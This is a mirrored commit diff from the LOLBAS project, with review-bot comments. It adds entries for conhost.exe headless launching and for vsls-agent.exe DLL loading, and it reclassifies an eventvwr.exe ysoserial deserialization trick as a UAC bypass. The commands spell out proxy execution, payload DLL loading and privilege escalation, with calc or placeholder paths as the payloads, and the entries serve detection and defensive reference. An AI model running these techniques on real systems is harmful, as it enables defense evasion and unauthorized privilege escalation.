mirror of https://github.com/LOLBAS-Project/LOLBAS
synced 2025-10-25 14:55:19 +02:00
	Add vsls-agent lolbin and committing a few other changes (#263)
Co-authored-by: Wietze <wietze@users.noreply.github.com>
		| @@ -11,6 +11,13 @@ Commands: | ||||
|     Privileges: User | ||||
|     MitreID: T1202 | ||||
|     OperatingSystem: Windows 10, Windows 11 | ||||
|   - Command: "conhost.exe --headless calc.exe" | ||||
|     Description: Execute calc.exe with conhost.exe as parent process | ||||
|     Usecase: Specify --headless parameter to hide child process window (if applicable) | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1202 | ||||
|     OperatingSystem: Windows 10, Windows 11 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\conhost.exe | ||||
| Detection: | ||||
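Review bot: the new `conhost.exe --headless calc.exe` command block adds an execution variant but no matching Detection entry; the `Detection:` line in the trailing context is left untouched, so please confirm the rule(s) already listed there match on the `--headless` argument, or add a detection line for it alongside the command. Also, the Usecase wording `hide child process window (if applicable)` is vague about when it applies; state the condition under which the window is hidden so analysts know what to expect in process telemetry.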
| @@ -19,6 +26,8 @@ Detection: | ||||
| Resources: | ||||
|   - Link: https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ | ||||
|   - Link: https://twitter.com/Wietze/status/1511397781159751680 | ||||
|   - Link: https://twitter.com/embee_research/status/1559410767564181504 | ||||
|   - Link: https://twitter.com/ankit_anubhav/status/1561683123816972288 | ||||
| Acknowledgement: | ||||
|   - Person: Adam | ||||
|     Handle: '@hexacorn' | ||||
|   | ||||
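Review bot: the two newly cited Resources (the `embee_research` and `ankit_anubhav` posts) are not reflected in the Acknowledgement section, which still names only Adam (`@hexacorn`); consider adding Person/Handle entries for the authors of the newly referenced research, using the same `- Person:` / `Handle:` format shown at the end of this file.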
| @@ -14,9 +14,9 @@ Commands: | ||||
|   - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe | ||||
|     Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net | ||||
|     Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. | ||||
|     Category: Execute | ||||
|     Category: UAC Bypass | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1202 | ||||
|     MitreID: T1548.002 | ||||
|     OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\eventvwr.exe | ||||
|   | ||||
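Review bot: the Category and MitreID changes move this entry from Execute/T1202 to UAC Bypass/T1548.002, but the unchanged Usecase line still reads `Execute a command to bypass security restrictions that limit the use of command-line interpreters.`, which describes the old T1202 classification rather than elevation; update the Usecase so that Category, MitreID and Usecase agree. `Privileges: Administrator` is consistent with a UAC bypass (an admin account running at medium integrity), so that line can stay as is.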
yml/OtherMSBinaries/vsls-agent.yml (Normal file, 22 lines added)
							| @@ -0,0 +1,22 @@ | ||||
| --- | ||||
| Name: vsls-agent.exe | ||||
| Description: Agent for Visual Studio Live Share (Code Collaboration) | ||||
| Author: Jimmy (@bohops) | ||||
| Created: 2022-11-01 | ||||
| Commands: | ||||
|   - Command: vsls-agent.exe --agentExtensionPath c:\path\to\payload.dll | ||||
|     Description: Load a library payload using the --agentExtensionPath parameter (32-bit) | ||||
|     Usecase: Execute proxied payload with Microsoft signed binary | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed) | ||||
| Full_Path: | ||||
|   - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml | ||||
| Resources: | ||||
|   - Link: https://twitter.com/bohops/status/1583916360404729857 | ||||
| Acknowledgement: | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
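Review bot: Full_Path lists only the Visual Studio 2019 Professional location (`c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe`), while the OperatingSystem field says other Visual Studio versions likely apply; since the install path depends on the edition and version, either add the other known paths or state explicitly that the path varies by installed edition. The `(32-bit)` note in the command Description would also benefit from a sentence on whether a 64-bit build accepts the same parameter, because the Sigma rule referenced under Detection, judging by its file name, keys on the `--agentExtensionPath` argument rather than on the binary's architecture.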